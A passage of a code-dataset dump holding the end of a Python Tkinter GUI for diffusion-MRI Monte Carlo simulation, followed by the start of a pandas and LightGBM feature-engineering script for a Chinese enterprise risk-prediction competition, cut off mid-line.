self.delGTxt = \"\\u0394G (mT/m)\" if self.constantDiffTime.get() else \"G\\u20D7 (mT/m)\";\n\n self.bMx_DelG_DelDelta_O['menu'].delete(0, 'end'); # First, delete all list, ...\n for choice in tuple((self.bMaxTxt, self.delGTxt, self.delDeltaTxt)):\n self.bMx_DelG_DelDelta_O['menu'].add_command(label=choice,\n command=tk._setit(self.bMx_DelG_DelDelta, choice));\n\n if self.bMcsDataLoaded and mgv.dGWaveTbl is not None:\n if (mgv.dGWaveTbl[:,0] + mgv.dGWaveTbl[:,1]).max() > 1e-3 * mgv.dtDiff:\n mgv.dGWaveTbl = None;\n self.bGWaveTblRead = False;\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\",\"blink\"]);\n txtC2 = mPstP.colored(\"The G-Table %s is unloaded.\" % mgv.gWaveFileName, \"red\", attrs=[\"bold\",\"blink\"]);\n print (txtC + txtC2 + \" Check the times.\");\n else:\n self.varyDelGdB.set( self.varyGdTxt );\n\n self.bigDel.set (1e3 * (mgv.dGWaveTbl[:,0].max() - mgv.dGWaveTbl[:,0].min()));\n self.smallDel.set(1e3 * (mgv.dGWaveTbl[:,1].max() ));\n\n # print out the maximum bVal, ..\n if self.mcsPstPro.get():\n mgv.Deltas = np.zeros( self.nbVals.get() + 1);\n mgv.nbVals = self.nbVals.get() + 1;\n\n dGradNB = [];\n mgv.smallDelta = 1e-3*self.smallDel.get();\n\n delta, Delta = 1e-3*self.smallDel.get(), 1e-3*self.bigDel.get();\n dirAng = self.grdDirFromZ.get()/57.299;\n\n if self.varyDelGdB.get() in [self.constBTxt, self.varyDelTxt]:\n self.entPsP[2].config (state=\"disabled\");\n\n maxDelStep = (mgv.dtDiff - 2*self.smallDel.get())/self.nbVals.get();\n\n if self.DeltaStep.get() > maxDelStep: self.DeltaStep.set( maxDelStep );\n\n mgv.Deltas[:] = 1e-3*self.DeltaStep.get()*np.arange(self.nbVals.get() + 1);\n\n # otherwise bVal becomes negative, ...\n mgv.Deltas[0] = 1e-3*self.smallDel.get();\n else: # b-value varies, with constant delta and Delta: self.varyGdTxt\n self.entPsP[2].config (state=\"normal\" );\n mgv.Deltas[:] = 1e-3*self.bigDel.get();\n\n # ....\n for k in range(self.nbVals.get() + 1):\n bValFct = 0.0;\n\n if self.varyDelGdB.get() == self.constBTxt: bValFct = 1.0;\n elif self.varyDelGdB.get() == self.varyGdTxt: bValFct = (k/self.nbVals.get())**2;\n else: bValFct = (mgv.Deltas[ k] - 1e-3*self.smallDel.get()/3) \\\n /(mgv.Deltas[-1] - 1e-3*self.smallDel.get()/3);\n\n if k==0: bValFct = 0.000001; # otherwise, error in mPstP, line 801\n\n dGradNB.append ((np.sin(dirAng), 0.0, np.cos(dirAng), bValFct));\n\n mgv.dGradNB = self.dGradNB = np.array(dGradNB).T;\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n if self.varyDelGdB.get() != self.varyGdTxt:\n self.bigDel.set ( 1e3*mgv.Deltas[-1] ); # show the largest Delta\n # self.bigDel.set ( self.DeltaStep.get() );\n\n if len(self.dGradNBL) == 0 and self.dGradNB is not None:\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n if len(self.dGradNBL) > 0:\n if self.dGradNBL[0][1].shape[1] != (self.nbVals.get() + 1): # for DTI simulation,\n mgv.dGradNBL = self.dGradNBL = [(\"dir0\", self.dGradNB)];\n\n # calc maximum B\n mgv.maxG = self.maxG.get();\n maxB = 1e-12*(mgv.gammaRad*mgv.smallDelta*self.maxG.get())**2 * 1e-3*(self.bigDel.get() - 1e-3*self.smallDel.get()/3);\n self.bMax.set(np.round(min(self.bMax.get(), maxB), 0));\n\n self.lblPsP[0].config(state=\"normal\" );\n self.entPsP[0].config(state=\"normal\" );\n\n # simulate for constant B with varying diffTime, ...\n if self.bMcsDataLoaded: # and self.bDGradDirRead:\n mgv.bMax = 1e6*self.bMax.get();\n delta, Delta = 1e-3*self.smallDel.get(), 1e-3*self.bigDel.get();\n if self.varyDelGdB.get() in [self.varyGdTxt, self.constBTxt]:\n GdStep = 1e3*np.sqrt(mgv.bMax/(Delta - delta/3)) \\\n /(self.gamma*delta*self.nbVals.get());\n elif self.varyDelGdB.get() == self.varyDelTxt:\n GdStep = 1e3*np.sqrt(mgv.bMax/(mgv.Deltas[-1] - delta/3))/(self.gamma*delta);\n\n self.GdStep.set ( np.around(GdStep, decimals=4) );\n\n txtC = mPstP.colored(\"[{:^10}:L{:0>4}]: : \".format(myMod1, getCurrLineNo()), \"green\", attrs=[\"bold\"]);\n txt = \"maximum bVal = %.1f %s\" % (self.bMax.get(), self.bUnit);\n\n print (txtC + txt);\n\n\n mgv.colorMap4Dsp = eval(\"cm.\" + self.colorMap4Dsp.get());\n mgv.plsSeqType = self.plsSeqType.get();\n if mgv.plsSeqType == \"StimEcho\": self.TE_ms.set(2*self.smallDel.get() + 5.12);\n else: self.TE_ms.set(self.smallDel.get() + self.bigDel.get() + 5.12);\n\n mgv.TE_ms = self.TE_ms.get();\n\n self.bigDel.set(np.round(max(self.bigDel.get(), self.smallDel.get() + 5.12), 2));\n\n if self.mcsPstPro.get(): self.t2Vals_E.config(state= \"normal\" );\n else: self.t2Vals_E.config(state=\"disabled\");\n\n t2ValsStr = self.t2Vals.get().replace(\",\",\".\").replace(\" \",\".\")\n self.t2Vals.set(t2ValsStr);\n mgv.icsT2, mgv.mlsT2, mgv.ecsT2 = np.array(self.t2Vals.get().split(\".\")[0:3], dtype=np.double);\n\n # END of updateProtFtn\n\n# pop up a help message box, ..\ndef getHelp (*args):\n global bYesNo;\n\n def popUpMessage (titleTxt, messageTxt):\n # popUpWin = tk.Tk(); # to change the display font, but not working, ...\n # popUpWin.option_add('*Dialog.msg.width', 50); # window wider\n # popUpWin.option_add('*font', self.inputFont);\n res = mBox.showinfo(titleTxt, messageTxt, icon=\"warning\");\n # popUpWin.option_clear();\n return res;\n\n argc = len(args);\n titleTxt, msgTxt = args[0:2];\n defAns = args[argc - 1];\n\n if argc > 2:\n bYesNo = mBox.askyesno(titleTxt, msgTxt, default=defAns, icon=\"question\");\n if bYesNo: popUpMessage(\"HELP\", args[2]);\n else: bYesNo = mBox.showinfo(titleTxt, msgTxt);\n\n return bYesNo;\n\ndef main_MCS():\n global GPS, gpsLblTxt;\n\n GUI = GUI_MCS();\n\n fgClr, bgClr = 'white', 'darkgreen';\n fgClrB, bgClrB = 'navy', 'black';\n hlBgColor = \"green\"\n\n if sys.version_info < (3, 6):\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=15);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=14);\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=16);\n infoFontB = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n else:\n if _platform in [\"win32\", \"windows\"]:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n infoFont = tkFont.Font(family=\"Helvetica\", size=11);\n elif _platform in [\"linux\"]:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=10);\n infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n else:\n procFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=12);\n titleFont = tkFont.Font(family=\"Helvetica\", weight='bold', size= 9);\n infoFont = tkFont.Font(family=\"Helvetica\", size=12);\n\n cmdFont = tkFont.Font(family=\"Helvetica\", weight='bold', size=11);\n infoFontB = tkFont.Font(family=\"Helvetica\", weight='bold', size= 8);\n\n GI = GUI.gui_makeInfoFrame ();\n\n wid1 = 9 if (_platform in [\"win32\", \"windows\", \"linux\"]) else 12;\n wid11 = wid1 if _platform not in [\"win32\", \"windows\"] else 6;\n GPS = tk.Label (GUI.frm3, text=\"MCS pstProc\", font=procFont,\n bg='black', fg='white', padx=4, pady=2,\n width=11, justify=tk.CENTER, relief=tk.RIDGE);\n GPS.grid (row=0, column=0, rowspan=6, sticky=\"ewns\");\n GPS.bind(\"\",\n lambda event: getHelp(\"Yes for further HELP\", hlp.mPstP, \"no\"));\n\n GUI.gui_mcsPstPro();\n\n # extra label to show information\n extra_L = tk.Label (GUI.frm4, text=\"N O T E\", font=procFont, # infoFontB,\n fg='white', bg='gray20', padx=4, pady=2,\n width=11 - 4*(_platform in [\"linux\"]),\n justify=tk.CENTER, relief=tk.RIDGE);\n extra_L.grid (row=0, rowspan=2, column=0, sticky=\"ewns\");\n\n extra1_L = tk.Label(GUI.frm4, text=hlp.hlpEX01, font=infoFont,\n fg='black', bg='gray68', padx=4, pady=2, width=38,\n justify=tk.LEFT, anchor=\"w\", relief=tk.RIDGE);\n extra1_L.grid (row=0, rowspan=2, column=1, columnspan=4, sticky=\"ewns\");\n\n extra2_L = tk.Label(GUI.frm4, text=hlp.hlpEX02, font=infoFont,\n fg='black', bg='gray68', padx=4, pady=2, width=38,\n justify=tk.LEFT, anchor=\"w\", relief=tk.RIDGE);\n extra2_L.grid (row=0, rowspan=2, column=5, columnspan=4, sticky=\"ewns\");\n\n root.mainloop();\n\n root.destroy ();\n\n return GUI;\n\n# Following lines are excuted, ...\nif __name__ == '__main__':\n hlp = HELP.helpTxt();\n mgv = MGV.mcsVars ();\n\n GUI = main_MCS();\n\n","sub_path":"mcsGUI.py","file_name":"mcsGUI.py","file_ext":"py","file_size_in_byte":46201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"42820464","text":"import gc\nimport re\nimport sys\nimport time\nimport jieba\nimport string\nimport codecs\nimport pickle\nimport hashlib\nimport os.path\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom collections import Counter\nfrom sklearn.metrics import f1_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import roc_auc_score\n\n\n\n\n\n######################################## 清洗数据 ########################################\nimport numpy as np\nimport pandas as pd\n\n\n\ndata_path = r'C:/Users/csw/Desktop/python/liangzi/data/'\n\n\nentbase = pd.read_csv(data_path + '1entbase.csv')\nalter = pd.read_csv(data_path + '2alter.csv')\nbranch = pd.read_csv(data_path + '3branch.csv')\ninvest = pd.read_csv(data_path + '4invest.csv')\nright = pd.read_csv(data_path + '5right.csv')\nproject = pd.read_csv(data_path + '6project.csv')\nlawsuit = pd.read_csv(data_path + '7lawsuit.csv')\nbreakfaith = pd.read_csv(data_path + '8breakfaith.csv')\nrecruit = pd.read_csv(data_path + '9recruit.csv')\nqualification = pd.read_csv(data_path + '10qualification.csv',encoding='GB2312')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntrain = pd.read_csv(data_path + 'train.csv')\n\nprint('将feature name转换为小写')\ndef conver2lower(data):\n new_columns = []\n for name in data.columns:\n new_columns.append(name.lower())\n data.columns = new_columns\n data.rename(columns={'eid': 'id'}, inplace=True)\n return data\n\nentbase = conver2lower(entbase)\nalter = conver2lower(alter)\nbranch = conver2lower(branch)\ninvest = conver2lower(invest)\nright = conver2lower(right)\nproject = conver2lower(project)\nlawsuit = conver2lower(lawsuit)\nbreakfaith = conver2lower(breakfaith)\nrecruit = conver2lower(recruit)\nqualification = conver2lower(qualification)\ntest = conver2lower(test)\ntrain = conver2lower(train)\n\ndef replace(s):\n if s is np.nan:\n return s\n if '美元' in s:\n return float(s.replace('美元', '').replace('万元', '').replace('万', '')) * 6.5\n if '港' in s:\n return float(s.replace('港', '').replace('币', '').replace('万元', '').replace('万', '')) * 0.85\n\n return float(s.replace('万元','').replace('人民币','').replace('万', '').replace('(单位:)', ''))\ndef get_area(s):\n if '美元' in s:\n return 2\n if '港币' in s:\n return 1\n return 0\n\nprint('数据清洗...')\nalter['altbe'] = alter['altbe'].apply(replace)\nalter['altaf'] = alter['altaf'].apply(replace)\nalter['alterno'].replace('A_015','15',inplace=True)\nqualification['begindate'] = qualification['begindate'].apply(lambda x: x.replace('年','-').replace('月',''))\nqualification['expirydate'] = qualification['expirydate'].apply(lambda x: x.replace('年','-').replace('月','') if type(x) is str else x)\nbreakfaith['fbdate'] = breakfaith['fbdate'].apply(lambda x: x.replace('年','-').replace('月',''))\nbreakfaith['sxenddate'] = breakfaith['sxenddate'].apply(lambda x: x.replace('年','-').replace('月','') if type(x) is str else x)\nlawsuit['lawdate'] = lawsuit['lawdate'].apply(lambda x: x.replace('年','-').replace('月',''))\nrecruit['pnum'] = recruit['pnum'].apply(lambda x: x.replace('若干','').replace('人','') if type(x) is str else x)\ntrain.rename(columns={'target':'label'},inplace=True)\n\nprint('覆盖原来数据')\nentbase.to_csv(data_path + '1entbase.csv',index=False,encoding='utf-8')\nalter.to_csv(data_path + '2alter.csv',index=False,encoding='utf-8')\nbranch.to_csv(data_path + '3branch.csv',index=False,encoding='utf-8')\ninvest.to_csv(data_path + '4invest.csv',index=False,encoding='utf-8')\nright.to_csv(data_path + '5right.csv',index=False,encoding='utf-8')\nproject.to_csv(data_path + '6project.csv',index=False,encoding='utf-8')\nlawsuit.to_csv(data_path + '7lawsuit.csv',index=False,encoding='utf-8')\nbreakfaith.to_csv(data_path + '8breakfaith.csv',index=False,encoding='utf-8')\nrecruit.to_csv(data_path + '9recruit.csv',index=False,encoding='utf-8')\nqualification.to_csv(data_path + '10qualification.csv',index=False,encoding='utf-8')\ntest.to_csv(data_path + 'evaluation_public.csv',index=False,encoding='utf-8')\ntrain.to_csv(data_path + 'train.csv',index=False,encoding='utf-8')\n\n#################################### 构造特征 #######################################\n\nglobal data_path\ncache_path = 'F:/liangzi_cache/'\nnew = False\n\n# 获取阈值\ndef get_threshold(preds):\n preds_temp = sorted(preds,reverse=True)\n n = sum(preds) # 实际正例个数\n m = 0 # 提交的正例个数\n e = 0 # 正确个数的期望值\n f1 = 0 # f1的期望得分\n for threshold in preds_temp:\n e += threshold\n m += 1\n f1_temp = e/(m+n)\n if f1>f1_temp:\n break\n else:\n f1 = f1_temp\n print('阈值为:{}'.format(threshold))\n print('提交正例个数为:{}'.format(m-1))\n print('期望得分为:{}'.format(f1*2))\n return [(1 if (pred>threshold) else 0) for pred in preds]\n\n# 合并节约内存\ndef concat(L):\n result = None\n for l in L:\n if result is None:\n result = l\n else:\n result[l.columns.tolist()] = l\n return result\n\n# 分组标准化\ndef grp_standard(data,key,names):\n for name in names:\n mean_std = data.groupby(key, as_index=False)[name].agg({'mean': 'mean',\n 'std': 'std'})\n data = data.merge(mean_std, on=key, how='left')\n data[name] = ((data[name]-data['mean'])/data['std']).fillna(0)\n data[name] = data[name].replace(-np.inf, 0)\n data.drop(['mean','std'],axis=1,inplace=True)\n return data\n\n# 分组归一化\ndef grp_normalize(data,key,names,start=0):\n for name in names:\n max_min = data.groupby(key,as_index=False)[name].agg({'max':'max',\n 'min':'min'})\n data = data.merge(max_min,on=key,how='left')\n data[name] = (data[name]-data['min'])/(data['max']-data['min'])\n data[name] = data[name].replace(-np.inf, start)\n data.drop(['max','min'],axis=1,inplace=True)\n return data\n\n# 分组排序\ndef grp_rank(data,key,names,ascending=True):\n for name in names:\n data.sort_values([key, name], inplace=True, ascending=ascending)\n data['rank'] = range(data.shape[0])\n min_rank = data.groupby(key, as_index=False)['rank'].agg({'min_rank': 'min'})\n data = pd.merge(data, min_rank, on=key, how='left')\n data['rank'] = data['rank'] - data['min_rank']\n data[names] = data['rank']\n data.drop(['rank'],axis=1,inplace=True)\n return data\n\n\n# 基础特征\ndef get_base_feat(stat,data,data_key):\n def id_convert(x):\n if 'p' in x:\n return -1\n if 's' in x:\n return 0 if int(x[1:])<500000 else 1\n else:\n return 0 if int(x) < 500000 else 1\n entbase = pd.read_csv(data_path + '1entbase.csv').fillna(-1)\n # stat_temp = stat.merge(entbase,on='id',how='left')\n feat = data.merge(entbase,on='id',how='left')\n feat['hy_count'] = feat['hy'].map(stat['hy'].value_counts())\n feat['etype_count'] = feat['etype'].map(stat['etype'].value_counts())\n feat['ienum'] = feat['inum'] - feat['enum']\n feat['rgyear'] = 2020 - feat['rgyear']\n # feat['zczb2'] = feat['zczb'] * (1.14 ** feat['rgyear'])\n feat['finzb2'] = feat['finzb'] / (feat['zczb'] + 0.1)\n feat['mpnum2'] = feat['mpnum'] / (feat['zczb'] + 0.1)\n feat['inum2'] = feat['inum'] / (feat['zczb'] + 0.1)\n feat['fstinum2'] = feat['fstinum'] / (feat['zczb'] + 0.1)\n feat['tzinum2'] = feat['tzinum'] / (feat['zczb'] + 0.1)\n feat['sumnum'] = feat[['mpnum','inum','fstinum','tzinum']].sum(axis=1)\n hy = pd.get_dummies(feat['hy'], prefix='hy')\n feat = pd.concat([feat,hy],axis=1)\n etype = pd.get_dummies(feat['etype'], prefix='etype')\n feat = pd.concat([feat, etype], axis=1)\n feat['id_feat'] = feat['id'].apply(id_convert)\n feat.fillna(0,inplace=True)\n feat.drop(['id','label'],axis=1,inplace=True)\n return feat\n\n# alter特征\ndef get_alter_feat(data,data_key):\n alter = pd.read_csv(data_path + '2alter.csv')\n alter['altdate'] = alter['altdate'].apply(lambda x:(2016-int(x[:4]))*12 - int(x[-2:]))\n alter.sort_values('altdate', ascending=True, inplace=True)\n n_alter = alter.groupby('id',as_index=False)['alterno'].agg({'n_alter':'size'})\n alterno = pd.get_dummies(alter['alterno'], prefix='alterno')\n alterno = pd.concat([alter[['id']], alterno], axis=1)\n alterno = alterno.groupby(['id'], as_index=False).sum()\n alter_first = alter.drop_duplicates('id',keep='first').rename(columns={'altdate':'altdate_first'})\n alter_last = alter.drop_duplicates('id', keep='last').rename(columns={'altdate':'altdate_last'})\n # alterno_time = alter.drop_duplicates(['id','alterno'], keep='last')[['id','alterno','altdate']]\n # alterno_time = alterno_time.set_index(['id','alterno']).unstack()\n # alterno_time.columns = alterno_time.columns.droplevel(0)\n # alterno_time = alterno_time.add_prefix('alterdate_').reset_index()\n # alter_money = alter[~alter['altbe'].isnull()].drop_duplicates('id', keep='first')\n # alter_money['alter_money'] = alter_money['altaf'] - alter_money['altbe']\n # alter_money['alter_rate'] = alter_money['alter_money'] / (alter_money['altbe']+0.1)\n feat = data.merge(n_alter, on='id', how='left').fillna(0)\n feat = feat.merge(alterno, on='id', how='left').fillna(0)\n # feat = feat.merge(alterno_time, on='id', how='left').fillna(0)\n feat = feat.merge(alter_first[['id', 'alterno', 'altdate_first']], on='id', how='left').fillna(-1)\n feat = feat.merge(alter_last[['id', 'altdate_last']], on='id', how='left').fillna(-1)\n # feat = feat.merge(alter_money[['id', 'alter_money', 'alter_rate','altbe']],on='id', how='left').fillna(-100000)\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# branch特征\ndef get_branch_feat(data,data_key):\n branch = pd.read_csv(data_path + '3branch.csv')\n branch['branch_active_year'] = branch['b_endyear'] - branch['b_reyear']\n feat = branch.groupby('id').agg({'b_endyear': {'n_branch': 'size',\n 'n_end_branch': 'count',\n 'last_end_branch': 'max',\n 'median_end_branch': 'median'},\n 'ifhome': {'n_home_branch': 'sum'},\n 'b_reyear': {'last_start_branch': 'max',\n 'first_start_branch': 'min'},\n 'branch_active_year': {'branch_active_year':'mean'}})\n feat.columns = feat.columns.droplevel(0)\n feat['id'] = feat.index\n feat['n_active_branch'] = feat['n_branch'] - feat['n_end_branch']\n feat['n_outer_branch'] = feat['n_branch'] - feat['n_home_branch']\n feat['active_branch_rate'] = feat['n_active_branch'] / (feat['n_branch'] + 0.1)\n feat['home_brach_rate'] = feat['n_home_branch'] / (feat['n_branch'] + 0.1)\n feat = data.merge(feat,on='id',how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# invest特征\ndef get_invest_feat(data,data_key):\n invest = pd.read_csv(data_path + '4invest.csv')\n # invest = invest[invest['id'] != invest['bteid']]\n train = pd.read_csv(data_path + 'train.csv')\n id_label_dict = dict(zip(train['id'].values,train['label'].values))\n invest['btlabel'] = invest['bteid'].map(id_label_dict)\n invest['idlabel'] = invest['id'].map(id_label_dict)\n n_invest = invest.groupby('id',as_index=False)['id'].agg({'n_invest':'count'})\n mean_btbl = invest.groupby('id', as_index=False)['btbl'].agg({'mean_btbl': 'mean'})\n sum_btbl = invest.groupby('id', as_index=False)['btbl'].agg({'sum_btbl': 'sum'})\n n_home_invest = invest.groupby('id', as_index=False)['ifhome'].agg({'n_home_invest': 'sum'})\n n_negitive_invest = invest.groupby('id', as_index=False)['btlabel'].agg({'n_negitive_invest': 'sum'})\n n_negitive_invest2 = invest.groupby('id', as_index=False)['btendyear'].agg({'n_negitive_invest2': 'count'})\n n_negitive_invested = invest.groupby('bteid', as_index=False)['idlabel'].agg({'n_negitive_invested': 'sum'})\n n_negitive_invested.rename(columns={'bteid':'id'},inplace=True)\n last_invest = invest.groupby('id',as_index=False)['btyear'].agg({'last_invest':'max'})\n last_negitive_invest = invest.groupby('id', as_index=False)['btendyear'].agg({'last_negitive_invest': 'max'})\n bt_invest = invest[['bteid','btyear','btendyear','btbl']].rename(columns={'bteid':'id'})\n bt_invest = bt_invest.groupby('id',as_index=False).max()\n feat = data.merge(n_invest, on='id', how='left')\n feat = feat.merge(n_home_invest, on='id', how='left')\n feat = feat.merge(mean_btbl, on='id', how='left')\n feat = feat.merge(sum_btbl, on='id', how='left')\n feat = feat.merge(n_negitive_invest, on='id', how='left')\n feat = feat.merge(n_negitive_invest2, on='id', how='left')\n feat = feat.merge(n_negitive_invested, on='id', how='left')\n feat = feat.merge(last_invest, on='id', how='left')\n feat = feat.merge(last_negitive_invest, on='id', how='left')\n feat = feat.merge(bt_invest, on='id', how='left')\n feat['home_invest_rate'] = feat['n_home_invest'] / (feat['n_invest']+0.1)\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# right特征\ndef get_right_feat(data, data_key):\n right = pd.read_csv(data_path + '5right.csv')\n nunique_right = right.groupby('id', as_index=False)['righttype'].agg({'nunique_right': 'nunique'})\n n_right1 = right[(right['askdate'] > '2012')].groupby('id', as_index=False)['righttype'].agg({'n_right1': 'count'})\n right['fbdate'] = right['fbdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[-2:]))\n right['weight'] = right['askdate'].apply(lambda x:0.5**(2015-int(x[:4])))\n right['askdate'] = right['askdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[-2:]))\n n_right = right.groupby('id', as_index=False)['id'].agg({'n_right': 'count'})\n n_right2 = right.groupby('id',as_index=False)['weight'].agg({'n_right2':'sum'})\n n_right3 = right.groupby('id', as_index=False)['fbdate'].agg({'n_right3': 'count'})\n righttype = pd.get_dummies(right['righttype'], prefix='righttype')\n righttype = pd.concat([right['id'], righttype], axis=1)\n righttype = righttype.groupby(['id'], as_index=False).sum()\n last_fbdate = right.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'min'})\n last_askdate = right.groupby('id', as_index=False)['askdate'].agg({'last_askdate': 'min'})\n feat = data.merge(n_right, on='id', how='left')\n feat = feat.merge(n_right2, on='id', how='left')\n feat = feat.merge(n_right3, on='id', how='left')\n feat = feat.merge(nunique_right, on='id', how='left')\n feat = feat.merge(n_right1, on='id', how='left')\n feat = feat.merge(righttype, on='id', how='left')\n feat = feat.merge(last_fbdate, on='id', how='left')\n feat = feat.merge(last_askdate, on='id', how='left')\n feat['n_right4'] = feat['n_right'] - feat['n_right3']\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# project特征\ndef get_project_feat(data, data_key):\n project = pd.read_csv(data_path + '6project.csv')\n project['djdate'] = project['djdate'].apply(lambda x: x if x is np.nan else (2020 - int(x[:4])) * 12 - int(x[5:7]))\n feat = project.groupby('id',as_index=False)['djdate'].agg({'n_project':'count',\n 'max_dfdate':'min',\n 'min_dfdate':'max',\n 'mean_dfdate': 'mean'})\n feat = data.merge(feat,on='id',how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n\n# lawsuit特征\ndef get_lawsuit_feat(data, data_key):\n lawsuit = pd.read_csv(data_path + '7lawsuit.csv')\n lawsuit.drop_duplicates(['id','lawdate','lawamount'],inplace=True)\n n_lawsuit = lawsuit.groupby('id', as_index=False)['id'].agg({'n_lawsuit': 'size'})\n sum_lawsuit_money = lawsuit.groupby('id', as_index=False)['lawamount'].agg({'lawamount': 'sum'})\n lawsuit['lawdate'] = lawsuit['lawdate'].apply(lambda x:(2016-int(x[:4]))*12 - int(x[-2:]))\n last_lawsuit_date = lawsuit.groupby('id', as_index=False)['lawdate'].agg({'last_lawsuit_date': 'min'})\n feat = data.merge(n_lawsuit, on='id', how='left')\n feat = feat.merge(sum_lawsuit_money, on='id', how='left')\n feat = feat.merge(last_lawsuit_date, on='id', how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# breakfaith特征\ndef get_breakfaith_feat(data, data_key):\n breakfaith = pd.read_csv(data_path + '8breakfaith.csv')\n breakfaith['fbdate'] = pd.to_datetime(breakfaith['fbdate']).apply(lambda x: (2016-x.year)*12 + x.month)\n breakfaith.drop_duplicates(['id', 'fbdate'], inplace=True)\n n_breakfaith = breakfaith.groupby('id', as_index=False)['id'].agg({'n_breakfaith': 'size'})\n last_fbdate = breakfaith.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'min'})\n first_fbdate = breakfaith.groupby('id', as_index=False)['fbdate'].agg({'last_fbdate': 'max'})\n feat = data.merge(n_breakfaith, on='id', how='left')\n feat = feat.merge(last_fbdate, on='id', how='left')\n feat = feat.merge(first_fbdate, on='id', how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\n# recruit特征\ndef get_recruit_feat(data, data_key):\n recruit = pd.read_csv(data_path + '9recruit.csv')\n recruit['recdate'] = recruit['recdate'].apply(lambda x: (2016 - int(x[:4])) * 12 - int(x[-2:]))\n # breakfaith.drop_duplicates(['id', 'fbdate'], inplace=True)\n n_recruit = recruit.groupby('id', as_index=False)['id'].agg({'n_recruit': 'size'})\n nunique_recruit = recruit.groupby('id', as_index=False)['poscode'].agg({'nunique_recruit': 'nunique'})\n sum_recruit_people = recruit.groupby('id', as_index=False)['pnum'].agg({'sum_recruit_people': 'sum',\n 'max_pnum':'max',\n 'mean_pnum':'mean'})\n last_lawsuit_date = recruit.groupby('id', as_index=False)['recdate'].agg({'last_lawsuit_date': 'min'})\n wzcode = recruit.groupby(['id','wzcode'])['pnum'].sum().unstack().reset_index()\n feat = data.merge(n_recruit, on='id', how='left')\n feat = feat.merge(nunique_recruit, on='id', how='left')\n feat = feat.merge(sum_recruit_people, on='id', how='left')\n feat = feat.merge(last_lawsuit_date, on='id', how='left')\n feat = feat.merge(wzcode, on='id', how='left')\n feat.drop(['id', 'label'], axis=1, inplace=True)\n return feat\n\ndef get_qualification_feat(data, data_key):\n qualification = pd.read_csv(data_path + '10qualification.csv', encoding='gb2312')\n n_qualification = qualification.groupby('id',as_index=False)['addtype'].agg({'n_qua':'count'})\n feat = data.merge(n_qualification,on='id',how='left')\n return feat\n\n\n\n# 二次处理特征\ndef second_feat(result):\n return result\n\n# 获取样本标签\ndef get_labels(data):\n train = pd.read_csv(r'C:/Users/csw/Desktop/python/liangzi/data/concat_data/train.csv')\n label_dict = dict(zip(train['id'].values,train['label'].values))\n data['label'] = data['id'].map(label_dict)\n return data\n\n# 构造训练集\ndef make_set(stat,data,path):\n global data_path\n data_path = path\n t0 = time.time()\n data_key = hashlib.md5(data.to_string().encode()).hexdigest()\n print('数据key为:{}'.format(data_key))\n result_path = cache_path + 'feat_set_{}.hdf'.format(data_key)\n if os.path.exists(result_path) & 0:\n result = pd.read_hdf(result_path, 'w')\n else:\n data.index = list(range(len(data.index)))\n entbase = pd.read_csv(data_path + '1entbase.csv').fillna(0)\n stat = stat.merge(entbase,on='id',how='left')\n print('开始构造特征...')\n base_feat = get_base_feat(stat, data,data_key) # 添加基础特征\n alter_feat = get_alter_feat(data,data_key) # alter特征\n branch_feat = get_branch_feat(data,data_key) # branch特征\n invest_feat = get_invest_feat(data,data_key) # invest特征\n right_feat = get_right_feat(data, data_key) # right特征\n project_feat = get_project_feat(data, data_key) # project特征\n lawsuit_feat = get_lawsuit_feat(data, data_key) # lawsuit特征\n breakfaith_feat = get_breakfaith_feat(data, data_key) # breakfaith特征\n recruit_feat = get_recruit_feat(data, data_key) # recruit特征\n # qualification_feat = get_qualification_feat(data, data_key)# qualification特征\n\n result = concat([data[['id']],base_feat,alter_feat ,branch_feat,invest_feat,right_feat,\n project_feat,lawsuit_feat,breakfaith_feat,recruit_feat\n ])\n result = get_labels(result)\n result = second_feat(result)\n result.to_hdf(result_path, 'w', complib='blosc', complevel=5)\n print('特征矩阵大小:{}'.format(result.shape))\n print('生成特征一共用时{}秒'.format(time.time() - t0))\n return result\n\n\n##################################### lgb重采样预测 ############################\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.cross_validation import KFold\n\nprint('读取train数据...')\ndata_path = 'C:/Users/csw/Desktop/python/liangzi/data/'\ncache_path = 'F:/liangzi_cache/'\n\ntrain = pd.read_csv(data_path + 'train.csv')\ntest = pd.read_csv(data_path + 'evaluation_public.csv')\ntest['label'] = np.nan\n\nprint('构造特征...')\ntrain_feat_temp = make_set(train,train,data_path)\ntest_feat = make_set(train,test,data_path)\nsumbmission = test_feat[['id']].copy()\n\npredictors = [f for f in train_feat_temp.columns if f not in ['id','label','enddate']]\n\ntrain_feat = train_feat_temp.append(train_feat_temp[train_feat_temp['prov']==11])\ntrain_feat = 